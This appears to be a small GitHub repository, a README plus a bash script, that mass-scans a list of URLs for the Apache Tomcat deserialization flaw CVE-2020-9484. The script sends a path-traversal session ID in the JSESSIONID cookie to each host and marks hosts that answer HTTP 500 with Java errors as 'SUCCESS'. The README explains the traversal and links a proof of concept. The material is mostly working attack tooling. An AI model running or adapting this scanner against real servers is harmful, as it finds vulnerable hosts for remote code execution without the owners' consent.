├── README.md
└── run.sh


/README.md:
--------------------------------------------------------------------------------
 1 | ## CVE-2020-9484-Mass-Scan
 2 | CVE-2020-9484 Mass Scanner, Scan a list of urls against Apache Tomcat deserialization (CVE-2020-9484) which could lead to RCE, determine possible vulnerable hosts.
 3 | 
 4 | 
 5 | ```
 6 | The web application will return HTTP 500 error upon exploitation, because it encounters a malicious serialized object instead of one that contains session information as it expects.
 7 | ```
 8 | 
 9 | 
10 | ```
11 | The Exploit:
12 | Tomcat requests the Manager to check if a session with session ID “../../../../../../tmp/12345” exists
13 | It will first check if it has that session in memory.
14 | It does not. But the currently running Manager is a PersistentManager, so it will also check if it has the session on disk.
15 | It will check at location directory + sessionid + ".session", which evaluates to “./session/../../../../../../tmp/12345.session“
16 | If the file exists, it will deserialize it and parse the session information from it
17 | ```
18 | 
19 | 
20 | Source: https://www.redtimmy.com/java-hacking/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/ 
21 | 
22 | 
23 | ```targets.txt```
24 | 
25 | ```
26 | https://example.com
27 | http://example:8080
28 | http://example.com/
29 | 
30 | ```
31 | 
32 | [Vuln Docker + PoC](https://github.com/masahiro331/CVE-2020-9484)
33 | 
34 | ```./run.sh targets.txt ../../../../../usr/local/tomcat/groovy > result.txt ```
35 | 
36 | ```cat result.txt | grep "SUCCESS"```
37 | 
38 | 
39 | 
40 | ## References 
41 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9484
42 | 
43 | https://meterpreter.org/cve-2020-9484-apache-tomcat-remote-code-execution-vulnerability-alert/
44 | 
45 | https://github.com/masahiro331/CVE-2020-9484
46 | 
47 | https://www.redtimmy.com/java-hacking/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/
48 | 
49 | 
50 | 
51 | 


--------------------------------------------------------------------------------
/run.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | 
 4 | for urls in $(cat $1)
 5 | do
 6 | 
 7 | if [ $(curl --connect-timeout 3.37 -sL -w '%{http_code}' $urls/index.jsp -H "Cookie: JSESSIONID=$2" -o /dev/null) == "500" ]
 8 | then
 9 | 
10 |   if [ $(curl --connect-timeout 3.37 "$urls/index.jsp" -H "Cookie: JSESSIONID=$2" | grep -oh "java" | sort -u) == "java" ]
11 |   then
12 |   echo -e "$urls SUCCESS"
13 |   else
14 |   echo -e "$urls RESEPONSE500"
15 |   fi
16 | 
17 | else
18 | echo -e "$urls xNOTVULNERABLE"
19 | fi
20 | done
21 | 


--------------------------------------------------------------------------------